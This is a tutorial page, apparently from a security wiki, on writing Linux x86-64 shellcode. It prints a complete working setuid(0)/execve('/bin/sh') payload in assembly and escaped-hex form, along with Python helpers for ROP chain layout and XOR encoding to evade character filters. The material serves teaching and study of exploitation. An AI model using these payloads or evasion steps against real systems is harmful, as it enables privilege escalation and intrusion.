

From NetSec

Shellcode, sometimes loosely called bytecode, is machine code (binary, usually written out in hexadecimal) that is commonly used as the payload in buffer overflow exploitation, and is usually presented to humans as assembly. A programmer can write any application in machine code by way of assembly (it is just as powerful as any other programming language), though unlike most other languages it is usually (but not always) limited to a single operating system and instruction set architecture.

All code described in this category is provided in the shellcode appendix.

Shellcode requires a basic understanding of bitwise math, Linux assembly, and stack overflows.


Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow exploit, keep in mind the potential obstructions from security infrastructure (such as DEP, ASLR, firewalls, or IDS and IPS appliances): filter bypass and IDS evasion techniques may be needed for successful exploitation past modern countermeasures.

This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested using OllyDbg or IDA Pro. The articles in this category contain small snippets of code taken from the examples found in the appendix; the shellcode and associated object files in this article are also contained in shellcodecs.

Types of shellcode

Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.

Executable vs. Return-oriented

There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack. If properly targeted, return-oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.

  • Return oriented shellcode utilizes return oriented programming in cases when the vulnerable buffer is non-executable. This is usually performed by constructing a call stack formatted in a similar fashion to that generated by an ordinary compiled application which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.
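
As a rough illustration of the call-stack layout described above, a return-oriented payload is often assembled as filler bytes followed by a sequence of packed addresses. The sketch below assumes a 64-bit little-endian target. The offset, the gadget, and every address in it are hypothetical placeholders rather than values from a real binary, and build_chain is a name made up for this example.

```python
import struct

def build_chain(padding_len, words):
    """Return filler bytes followed by each 64-bit word packed little-endian."""
    padding = b"A" * padding_len   # fills the buffer up to the saved return address
    chain = b"".join(struct.pack("<Q", w) for w in words)
    return padding + chain

# Hypothetical values for illustration only.
POP_RDI_RET = 0x0000000000401234   # assumed address of a "pop %rdi; ret" gadget
ARG_VALUE   = 0x0000000000000000   # value the gadget would load into %rdi
TARGET_FUNC = 0x0000000000401456   # assumed address that control finally returns to

payload = build_chain(72, [POP_RDI_RET, ARG_VALUE, TARGET_FUNC])
print(len(payload))
print(payload[72:80].hex())
```

Addresses packed this way usually contain null bytes, so a layout like this only survives copy routines that do not stop at a null terminator.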

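Certain instruction set architectures, such as MIPS, keep the return address in a link register instead of having the call instruction push it onto the stack, which changes how return-oriented programming and traditional stack overflows apply. Non-leaf functions still save that register to the stack, so such targets should not be assumed immune.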

Countermeasures and environmental hostility

While traditional binary shellcode will normally work unencumbered for unsanitized, unpatched, or larger inputs, many target environments and applications have limiting factors that serve as obstacles to the execution of traditional machine code. Most applications written in C or C++ will require that the machine code be null-free, because their string-handling routines treat a null byte as the end of the input. This is why null-free shellcode is the traditional basic form of executable shellcode programming.
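
To see why null bytes matter, the sketch below mimics how a C string copy such as strcpy stops at the first zero byte, and compares two ways of loading the value 0x3b. The helper names are made up for this illustration.

```python
def c_string_copy(data):
    """Mimic strcpy: keep everything before the first null byte."""
    return data.split(b"\x00", 1)[0]

def bad_byte_offsets(data, bad=b"\x00"):
    """Return the offset of every byte in data that appears in bad."""
    return [i for i, b in enumerate(data) if b in bad]

# "mov $0x3b,%eax" assembles to b8 3b 00 00 00 and contains three nulls;
# "pushq $0x3b; pop %rax" assembles to 6a 3b 58 and contains none.
with_nulls = bytes.fromhex("b83b000000")
null_free = bytes.fromhex("6a3b58")

print(bad_byte_offsets(with_nulls))     # [2, 3, 4]
print(c_string_copy(with_nulls).hex())  # b83b
print(bad_byte_offsets(null_free))      # []
```

The first encoding would be cut off after two bytes by a null-terminated copy, while the push/pop pair passes through intact.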

  • Character filters can be evaded by using polymorphic (self-modifying) code to reconstruct, at runtime, bytecode that falls outside the allowed character set. Most character filters restrict input to the printable keyspace, so ASCII shellcode and alphanumeric shellcode have become prevalent means of circumventing them.
  • Character encoding can be handled by encoding the payload so that it decodes to the proper machine code. Often the code must survive Unicode, base64, case conversion, or other transformations before being copied into the vulnerable buffer.
  • Buffer size may be severely limited and can require second-order injection when the payload is too large to fit into the vulnerable buffer. As a result, shellcode is traditionally kept as small as possible for optimal reusability.
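
One common way to keep filtered bytes out of a payload is to XOR it with a single-byte key and let a small decoder stub undo the XOR at runtime. The sketch below covers only the encoding side; the decoder stub is not shown, the filter set is an assumption, and the helper names are hypothetical. The sample bytes are the first instructions of the example payload used later in this article.

```python
def xor_bytes(data, key):
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)

def find_key(data, bad):
    """Return the first key (1-255) whose encoding of data avoids every byte in bad, or None."""
    for key in range(1, 256):
        if key in bad:
            continue  # the key itself must also survive the filter
        if not any(b in bad for b in xor_bytes(data, key)):
            return key
    return None

payload = bytes.fromhex("4831ff6a69580f05")  # xor/pushq/pop/syscall from the example
bad = b"\x00\x0a\x0d\x05"                    # assumed filter: null, LF, CR, and 0x05

key = find_key(payload, bad)
encoded = xor_bytes(payload, key)

# XOR is its own inverse, so applying the same key again restores the payload.
assert xor_bytes(encoded, key) == payload
print(hex(key), encoded.hex())
```

A single-byte key is the simplest case. If no key clears the filter, find_key returns None and a different encoding scheme would be needed.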

Shellcode mechanics

Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.

Environmental factors

  • Operating systems expose their system call interfaces differently. Normally (but not always) shellcode for Linux relies on kernel interrupts (or the syscall instruction on x86-64) for unlinked calls, while Microsoft Windows does not provide a stable interrupt API, so shellcode must use PE parsing to perform its own linking at runtime.

Assembling the code

Create a text file named test_shellcode.s.

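This example will use hatter's null-free 34-byte payload for setuid(0); execve('/bin/sh',null,null). Copy the following code into test_shellcode.s, then save it:

# 34 bytes
.globl _start
_start:
  xor    %rdi,%rdi                    # rdi = 0 (uid argument)
  pushq  $0x69
  pop    %rax                         # rax = 0x69 (setuid)
  syscall                             # setuid(0)
  push   %rdi
  push   %rdi
  pop    %rsi                         # rsi = 0 (argv)
  pop    %rdx                         # rdx = 0 (envp)
  movabs $0x68732f6e69622f6a,%rdi     # "j/bin/sh" in little-endian order
  shr    $0x8,%rdi                    # drop the "j", leaving "/bin/sh\0"
  push   %rdi
  push   %rsp
  pop    %rdi                         # rdi = pointer to "/bin/sh"
  pushq  $0x3b
  pop    %rax                         # rax = 0x3b (execve)
  syscall                             # execve("/bin/sh", 0, 0)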

When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:


localhost:~ $ as test_shellcode.s -o test_shellcode.o

Extracting the shellcode

Once the source has been assembled, the bytecode can be read out of the object file with objdump, the GNU binary object dumper:


localhost:~ $ objdump -d test_shellcode.o

The middle column contains the instruction bytes corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation alongside the disassembly of the debugged application. In this case:

localhost:~ $ objdump -d test_shellcode.o

test_shellcode.o: file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
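
The movabs and shr pair in the listing can look opaque at first. As a sanity check, the sketch below interprets the 64-bit immediate the way a little-endian x86-64 machine stores it in memory, before and after the 8-bit right shift. It also prints the two syscall numbers in decimal, which on x86-64 Linux correspond to setuid (105) and execve (59).

```python
import struct

imm = 0x68732f6e69622f6a              # immediate loaded by movabs in the listing

before = struct.pack("<Q", imm)       # bytes as they would sit in memory
after = struct.pack("<Q", imm >> 8)   # same register after "shr $0x8,%rdi"

print(before)       # b'j/bin/sh'
print(after)        # b'/bin/sh\x00'
print(0x69, 0x3b)   # 105 59
```

The shift discards the filler byte and brings in a zero at the top of the register, so the string gains its terminator without a null byte appearing in the encoded instructions.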

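The hexadecimal in the middle column is the bytecode for the executable segment. To make this into "shellcode", place a \x prefix before each byte, like so:

\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
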
If desired, the escaped string can be turned directly into raw binary using perl's print statement, "echo -en" in bash, or another interpreted language.
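
The manual step of copying the middle column can also be scripted. The sketch below is one possible approach, assuming the tab-separated layout that objdump -d prints above; the function names are invented for this example, and the sample input is a three-line excerpt of that output.

```python
import re

def bytes_from_objdump(text):
    """Collect the hex byte column from lines of `objdump -d` output."""
    out = bytearray()
    for line in text.splitlines():
        # Instruction lines look like "   c:<TAB>48 bf 6a ... <TAB>movabs ..."
        m = re.match(r"^\s*[0-9a-f]+:\t((?:[0-9a-f]{2} )+)", line)
        if m:
            out += bytes.fromhex(m.group(1))
    return bytes(out)

def to_escaped(data):
    """Format bytes as a \\xNN string suitable for echo -en or a C literal."""
    return "".join("\\x%02x" % b for b in data)

sample = (
    "0000000000000000 <_start>:\n"
    "   0:\t48 31 ff             \txor    %rdi,%rdi\n"
    "   c:\t48 bf 6a 2f 62 69 6e \tmovabs $0x68732f6e69622f6a,%rdi\n"
    "  13:\t2f 73 68 \n"
)

code = bytes_from_objdump(sample)
print(to_escaped(code))
```

The raw bytes in code could then be written to a file opened in binary mode, which gives the same result as the echo -en approach.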

Shellcode Disassembly

You will often come across shellcode in the wild, for example when analyzing malware or the newest exploit, and may want to disassemble it to learn what it does. The easiest way to do this is with objdump. This example uses the code just constructed, the 64-bit setuid() shell payload:

 localhost:~ $ echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 shellcode:     file format binary
 Disassembly of section .data:
 00000000 <.data>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 

Shellcode is part of a series on programming.
Shellcode is part of a series on exploitation.